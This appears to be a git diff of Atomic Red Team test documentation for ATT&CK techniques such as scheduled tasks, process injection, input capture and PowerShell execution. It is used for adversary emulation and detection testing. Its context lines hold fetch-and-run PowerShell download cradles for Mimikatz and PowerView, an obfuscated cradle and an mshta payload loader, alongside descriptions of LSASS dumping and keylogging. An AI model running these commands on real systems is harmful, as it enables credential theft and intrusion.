## Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task - -auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b - Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. + **Supported Platforms:** Windows +**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + + + diff --git a/atomics/T1053.006/T1053.006.md b/atomics/T1053.006/T1053.006.md index 998c17fb..1c020d8c 100644 --- a/atomics/T1053.006/T1053.006.md +++ b/atomics/T1053.006/T1053.006.md @@ -14,13 +14,15 @@ An adversary may use systemd timers to execute malicious code at system startup
## Atomic Test #1 - Create Systemd Service and Timer - -auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b - This test creates Systemd service and timer then starts and enables the Systemd timer + **Supported Platforms:** Linux +**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b + + + #### Inputs: diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md index eefb07ca..fc86bcbc 100644 --- a/atomics/T1053.007/T1053.007.md +++ b/atomics/T1053.007/T1053.007.md @@ -14,13 +14,15 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
## Atomic Test #1 - ListCronjobs - -auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd - Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + + + #### Inputs: @@ -45,13 +47,15 @@ kubectl get cronjobs -n #{namespace}
## Atomic Test #2 - CreateCronjob - -auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 - Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + + + #### Inputs: diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md index 76a8f433..c014cfde 100644 --- a/atomics/T1055.001/T1055.001.md +++ b/atomics/T1055.001/T1055.001.md @@ -16,16 +16,18 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via mavinject.exe - -auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - Windows 10 Utility To Inject DLLS. Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + **Supported Platforms:** Windows +**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254 + + + #### Inputs: diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md index a007e2cc..06a329a9 100644 --- a/atomics/T1055.004/T1055.004.md +++ b/atomics/T1055.004/T1055.004.md @@ -16,9 +16,6 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via C# - -auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 - Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques @@ -28,9 +25,14 @@ Excercises Five Techniques 4. IatInjection 5. ThreadHijack Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1 + + + #### Inputs: diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index e514407f..df2fa1a2 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -16,14 +16,16 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
## Atomic Test #1 - Process Hollowing using PowerShell - -auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c - This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c + + + #### Inputs: @@ -57,13 +59,15 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
## Atomic Test #2 - RunPE via VBA - -auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b - This module executes notepad.exe from within the WINWORD.EXE process + **Supported Platforms:** Windows +**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b + + + #### Inputs: diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 48f20359..453192f3 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -16,17 +16,19 @@ More sophisticated samples may perform multiple process injections to segment mo
## Atomic Test #1 - Shellcode execution via VBA - -auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 - This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required. + **Supported Platforms:** Windows +**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048 + + + @@ -65,16 +67,18 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz - -auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 - Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). It must be executed in the context of a user who is privileged on remote `machine`. The effect of `/inject` is explained in + **Supported Platforms:** Windows +**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83 + + + #### Inputs: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index f0ac2787..76f5881a 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -20,17 +20,19 @@ Keylogging is the most prevalent type of input capture, with many different ways
## Atomic Test #1 - Input Capture - -auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 - Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. + **Supported Platforms:** Windows +**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26 + + + #### Inputs: @@ -60,17 +62,19 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
## Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d - -auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b - Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. + **Supported Platforms:** Linux +**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b + + + diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md index 4cedb33c..fa8c19e0 100644 --- a/atomics/T1056.002/T1056.002.md +++ b/atomics/T1056.002/T1056.002.md @@ -14,14 +14,16 @@ Adversaries may mimic this functionality to prompt users for credentials with a
## Atomic Test #1 - AppleScript - Prompt User for Password - -auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15 - Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html + **Supported Platforms:** macOS +**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15 + + + @@ -41,15 +43,17 @@ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Pr
## Atomic Test #2 - PowerShell - Prompt User for Password - -auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 - Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py + **Supported Platforms:** Windows +**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 + + + diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md index f9fef8ef..b3eab452 100644 --- a/atomics/T1056.004/T1056.004.md +++ b/atomics/T1056.004/T1056.004.md @@ -15,13 +15,15 @@
## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages - -auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 - Hooks functions in PowerShell to read TLS Communications + **Supported Platforms:** Windows +**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33 + + + #### Inputs: diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 40a1227b..68e6c297 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -14,15 +14,17 @@ In Windows environments, adversaries could obtain details on running processes u
## Atomic Test #1 - Process Discovery - ps - -auto_generated_guid: 4ff64f0b-aaf2-4866-b39d-38d9791407cc - Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc + + + #### Inputs: @@ -52,15 +54,17 @@ rm #{output_file}
## Atomic Test #2 - Process Discovery - tasklist - -auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 - Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908 + + + diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index aa9120ec..d86d109d 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -50,13 +50,15 @@ PowerShell commands/scripts can also be executed without directly invoking the <
## Atomic Test #1 - Mimikatz - -auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027 - Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027 + + + #### Inputs: @@ -81,15 +83,17 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - Run BloodHound from local disk - -auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350 - Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. + **Supported Platforms:** Windows +**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350 + + + #### Inputs: @@ -133,15 +137,17 @@ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804
## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle - -auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 - Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. + **Supported Platforms:** Windows +**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7 + + + @@ -168,13 +174,15 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
## Atomic Test #4 - Obfuscation Tests - -auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" + **Supported Platforms:** Windows +**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804 + + + @@ -196,13 +204,15 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys - -auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d - Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d + + + @@ -222,15 +232,17 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
## Atomic Test #6 - Invoke-AppPathBypass - -auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372 - Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ + **Supported Platforms:** Windows +**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372 + + + @@ -250,15 +262,17 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
## Atomic Test #7 - Powershell MsXml COM object - with prompt - -auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da - Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da + + + #### Inputs: @@ -283,15 +297,17 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
## Atomic Test #8 - Powershell XML requests - -auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 - Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6 + + + #### Inputs: @@ -316,15 +332,17 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
## Atomic Test #9 - Powershell invoke mshta.exe download - -auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af - Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af + + + #### Inputs: @@ -349,14 +367,16 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
## Atomic Test #10 - Powershell Invoke-DownloadCradle - -auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 - Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. + **Supported Platforms:** Windows +**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 + + + #### Run it with these steps! @@ -373,14 +393,16 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
## Atomic Test #11 - PowerShell Fileless Script Execution - -auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73 - Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. + **Supported Platforms:** Windows +**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73 + + + @@ -407,15 +429,17 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
## Atomic Test #12 - PowerShell Downgrade Attack - -auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e - This test requires the manual installation of PowerShell V2. Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ + **Supported Platforms:** Windows +**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e + + + @@ -447,13 +471,15 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
## Atomic Test #13 - NTFS Alternate Data Stream Access - -auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 - Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 + + + #### Inputs: @@ -496,14 +522,16 @@ Write-Host Prereq's for this test cannot be met automatically
## Atomic Test #14 - PowerShell Session Creation and Use - -auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd - Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd + + + #### Inputs: @@ -550,13 +578,15 @@ Enable-PSRemoting
## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations - -auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7 - Executes powershell.exe with variations of the -Command parameter + **Supported Platforms:** Windows +**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7 + + + #### Inputs: @@ -596,13 +626,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments - -auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790 - Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied + **Supported Platforms:** Windows +**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790 + + + #### Inputs: @@ -643,13 +675,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations - -auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 - Executes powershell.exe with variations of the -EncodedCommand parameter + **Supported Platforms:** Windows +**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 + + + #### Inputs: @@ -689,13 +723,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments - -auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b - Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied + **Supported Platforms:** Windows +**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b + + + #### Inputs: diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md index ac93ee4f..404aff72 100644 --- a/atomics/T1059.002/T1059.002.md +++ b/atomics/T1059.002/T1059.002.md @@ -16,16 +16,18 @@ Adversaries may abuse AppleScript to execute various behaviors, such as interact
## Atomic Test #1 - AppleScript - -auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2 - Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire + **Supported Platforms:** macOS +**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2 + + + diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 920ce645..4a96ddef 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -16,13 +16,15 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
## Atomic Test #1 - Create and Execute Batch Script - -auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388 - Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. + **Supported Platforms:** Windows +**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388 + + + #### Inputs: @@ -65,13 +67,15 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
## Atomic Test #2 - Writes text to a file and displays it. - -auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e - Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. + **Supported Platforms:** Windows +**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e + + + #### Inputs: diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md index db220177..c5280a49 100644 --- a/atomics/T1059.004/T1059.004.md +++ b/atomics/T1059.004/T1059.004.md @@ -16,13 +16,15 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
## Atomic Test #1 - Create and Execute Bash Shell Script - -auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 - Creates and executes a simple bash script. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 + + + #### Inputs: @@ -54,15 +56,17 @@ rm #{script_path}
## Atomic Test #2 - Command-Line Interface - -auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c - Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c + + + diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index e78a44ae..41960a40 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -18,15 +18,17 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
## Atomic Test #1 - Visual Basic script execution to gather local computer information - -auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9 - Visual Basic execution test, execute vbscript via PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9 + + + #### Inputs: @@ -70,17 +72,19 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
## Atomic Test #2 - Encoded VBS code execution - -auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa - This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005" A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required. You can validate this by opening WinWord -> File -> Account -> About Word + **Supported Platforms:** Windows +**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa + + + @@ -123,15 +127,17 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #3 - Extract Memory via VBA - -auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 - This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. + **Supported Platforms:** Windows +**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6 + + + #### Inputs: diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 216ee5fb..db4b1100 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -16,13 +16,15 @@ Python comes with many built-in packages to interact with the underlying system,
## Atomic Test #1 - Execute shell script via python's command mode arguement - -auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb - Download and execute shell script and write to file then execute locally using Python -c (command mode) + **Supported Platforms:** Linux +**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + + + #### Inputs: @@ -67,13 +69,15 @@ pip install requests
## Atomic Test #2 - Execute Python via scripts (Linux) - -auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 - Create Python file (.py) that downloads and executes shell script via executor arguments + **Supported Platforms:** Linux +**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + + + #### Inputs: @@ -129,13 +133,15 @@ pip install requests
## Atomic Test #3 - Execute Python via Python executables (Linux) - -auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa - Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments + **Supported Platforms:** Linux +**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + + + #### Inputs: diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md index 05acf215..56654c95 100644 --- a/atomics/T1069.001/T1069.001.md +++ b/atomics/T1069.001/T1069.001.md @@ -16,13 +16,15 @@ Commands such as net localgroup of the [Net](https://attack.mitre.o
## Atomic Test #1 - Permission Groups Discovery (Local) - -auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae - Permission Groups Discovery + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae + + + @@ -44,14 +46,16 @@ if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from
## Atomic Test #2 - Basic Permission Groups Discovery Windows (Local) - -auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8 - Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8 + + + @@ -72,14 +76,16 @@ net localgroup "Administrators"
## Atomic Test #3 - Permission Groups Discovery PowerShell (Local) - -auto_generated_guid: a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 - Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 + + + diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 228f6b73..2ea99ae1 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -26,14 +26,16 @@ Commands such as net group /domain of the [Net](https://attack.mitr
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain) - -auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d - Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d + + + @@ -56,14 +58,16 @@ net group "enterprise admins" /domain
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain) - -auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 - Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 + + + #### Inputs: @@ -88,14 +92,16 @@ get-ADPrincipalGroupMembership #{user} | select name
## Atomic Test #3 - Elevated group enumeration using net group (Domain) - -auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 - Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37 + + + @@ -118,13 +124,15 @@ net group "BUILTIN\Backup Operators" /doma
## Atomic Test #4 - Find machines where user has local admin access (PowerView) - -auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1 - Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1 + + + @@ -145,13 +153,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #5 - Find local admins on all machines in domain (PowerView) - -auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd - Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd + + + @@ -172,13 +182,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
